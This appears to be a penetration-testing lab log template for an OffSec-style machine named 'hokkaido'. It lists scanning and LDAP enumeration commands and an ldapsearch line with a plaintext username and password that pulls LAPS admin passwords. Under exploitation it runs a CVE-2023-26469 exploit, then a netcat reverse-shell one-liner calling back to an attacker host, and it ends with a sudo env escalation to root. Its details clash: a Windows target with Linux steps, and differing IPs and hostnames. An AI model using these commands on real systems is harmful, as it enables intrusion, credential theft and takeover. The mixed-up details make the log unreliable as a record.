hokkaido
๐งช Pentest Log: {{date:2025-07-30}}
๐ Target Information
- Machine Name: hokkaido
- IP Address: 192.168.148.40
- Operating System: Windows
ip=192.168.148.40
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 53
dig ANY @$ip <DOMAIN>
dig axfr @$ip
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Port 88
Port 135
Port 139/445
smbclient -L \\\\$ip\\
enum4linux -a $ip
Port 389, 636, 3268, 3269
ldapsearch -H ldap://$ip -x -s base namingcontexts
ldapsearch -H ldap://$ip -x -b"DC=hutch,DC=offsec" > ldap_dump.txt
ldapsearch -v -c -D fmcsorley@hutch.offsec -w CrabSharkJellyfish192 -b "DC=hutch,DC=offsec" -H ldap://$ip "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
Port 1433
Port 8530
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
CVE-2023-26469
python3 exploit.py http://192.168.176.109/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.163 9090 >/tmp/f
nc -lvnp 9090
๐งฌ Privilege Escalation
๐ค Current Access
- User: jordak
- Groups: jordak, sudo
- Shell Type: php reverse shell
๐ Enumeration
Sudo Check:
sudo -l
found
User jordak may run the following commands on jordak:
(ALL : ALL) ALL
(ALL) NOPASSWD: /usr/bin/env
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Sudo Misconfiguration
- Target Binary/Service: env
- Reference / Source: GTFOBins
๐ง Exploit Steps
- Smash to root
sudo env /bin/sh